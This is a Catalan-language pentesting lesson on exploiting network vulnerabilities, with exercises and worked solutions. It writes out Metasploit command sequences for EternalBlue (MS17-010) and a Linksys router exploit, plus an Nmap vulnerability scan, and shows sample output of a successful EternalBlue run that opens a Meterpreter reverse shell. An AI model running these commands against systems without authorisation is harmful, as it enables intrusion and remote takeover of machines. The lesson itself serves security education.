Introducció

L'explotació de vulnerabilitats de xarxa és una fase crítica en el procés de pentesting. Aquesta etapa implica identificar i aprofitar les vulnerabilitats en la infraestructura de xarxa per obtenir accés no autoritzat, escalar privilegis o comprometre sistemes i dades. En aquest tema, explorarem les tècniques i eines utilitzades per explotar vulnerabilitats de xarxa.

Conceptes Clau

  1. Vulnerabilitats de Xarxa: Punts febles en la configuració, implementació o manteniment de la infraestructura de xarxa que poden ser explotats per atacants.
  2. Explotació Remota: Aprofitar vulnerabilitats des d'una ubicació remota sense accés físic a la xarxa.
  3. Explotació Local: Aprofitar vulnerabilitats des de dins de la xarxa, sovint després d'haver obtingut accés inicial.
  4. Eines d'Explotació: Programari utilitzat per identificar i explotar vulnerabilitats de xarxa.

Tècniques d'Explotació de Xarxa

  1. Explotació de Protocols de Xarxa

a. Protocols Insegurs

Molts protocols de xarxa, com Telnet, FTP i SNMP, poden ser insegurs si no es configuren correctament. Els atacants poden interceptar i manipular el trànsit de xarxa per obtenir credencials o injectar comandes malicioses.

b. Sniffing de Paquets

El sniffing de paquets implica capturar i analitzar el trànsit de xarxa per identificar informació sensible, com credencials d'usuari o dades no xifrades.

# Exemple d'ús de Wireshark per capturar paquets
sudo wireshark

  1. Explotació de Serveis de Xarxa

a. Escaneig de Vulnerabilitats

Utilitzar eines com Nmap per identificar serveis vulnerables en la xarxa.

# Exemple d'escaneig amb Nmap per identificar serveis vulnerables
nmap -sV --script vuln <IP-OBJECTIU>

b. Explotació de Serveis

Utilitzar exploits coneguts per comprometre serveis vulnerables. Metasploit és una eina popular per aquest propòsit.

# Exemple d'ús de Metasploit per explotar un servei vulnerable
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST <IP-OBJECTIU>
run

  1. Explotació de Dispositius de Xarxa

a. Routers i Switches

Els routers i switches poden tenir vulnerabilitats en el seu firmware o configuració que poden ser explotades per obtenir accés a la xarxa.

b. Explotació de Firmware

Actualitzar el firmware amb versions vulnerables o utilitzar exploits específics per comprometre dispositius de xarxa.

# Exemple d'ús de Metasploit per explotar un router
msfconsole
use exploit/linux/http/linksys_themoon_exec
set RHOST <IP-OBJECTIU>
run

Eines d'Explotació de Xarxa

Eina Descripció Ús Principal
Nmap Eina d'escaneig de xarxa per identificar hosts i serveis actius. Escaneig de vulnerabilitats
Wireshark Analitzador de paquets de xarxa per capturar i analitzar trànsit. Sniffing de paquets
Metasploit Plataforma per desenvolupar, provar i utilitzar exploits. Explotació de serveis i dispositius
Nessus Escàner de vulnerabilitats per identificar problemes de seguretat. Escaneig de vulnerabilitats

Exercicis Pràctics

Exercici 1: Escaneig de Vulnerabilitats amb Nmap

  1. Escaneja una IP objectiu per identificar serveis vulnerables.
  2. Utilitza el següent comandament:
nmap -sV --script vuln <IP-OBJECTIU>
  1. Analitza els resultats i identifica possibles vulnerabilitats.

Exercici 2: Explotació d'un Servei Vulnerable amb Metasploit

  1. Inicia Metasploit i selecciona un exploit per a un servei vulnerable.
  2. Configura els paràmetres necessaris (RHOST, RPORT, etc.).
  3. Executa l'exploit i comprova si has aconseguit comprometre el servei.
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST <IP-OBJECTIU>
run

Solucions als Exercicis

Solució a l'Exercici 1

  1. Executa l'escaneig amb Nmap:
nmap -sV --script vuln <IP-OBJECTIU>
  1. Revisa els resultats per identificar serveis vulnerables. Per exemple, podries veure alguna cosa com:
PORT    STATE SERVICE VERSION
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1
|_smb-vuln-ms17-010: Vulnerable

Solució a l'Exercici 2

  1. Inicia Metasploit i selecciona l'exploit:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
  1. Configura els paràmetres:
set RHOST <IP-OBJECTIU>
  1. Executa l'exploit:
run
  1. Si l'explotació és exitosa, veuràs una sessió oberta:
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Connecting to target for exploitation.
[*] 192.168.1.101:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.101:445 - Sending SMB Echo request
[*] 192.168.1.101:445 - Receiving response from exploit packet
[*] 192.168.1.101:445 - Sending final SMB Echo request
[*] 192.168.1.101:445 - Receiving final SMB Echo response
[*] 192.168.1.101:445 - Sending last fragment of exploit packet
[*] 192.168.1.101:445 - Receiving response from last exploit packet
[*] 192.168.1.101:445 - Sending egg to corrupted connection.
[*] 192.168.1.101:445 - Triggering free of corrupted buffer.
[*] Sending stage (179267 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:49158) at 2023-10-10 10:00:00 +0000

Conclusió

L'explotació de vulnerabilitats de xarxa és una habilitat essencial per a qualsevol pentester. Comprendre les tècniques i eines disponibles permet identificar i aprofitar les vulnerabilitats en la infraestructura de xarxa, ajudant a millorar la seguretat global dels sistemes. En el proper mòdul, explorarem l'explotació de vulnerabilitats de sistemes, aprofundint en tècniques específiques per comprometre sistemes operatius i aplicacions.

© Copyright 2024. Tots els drets reservats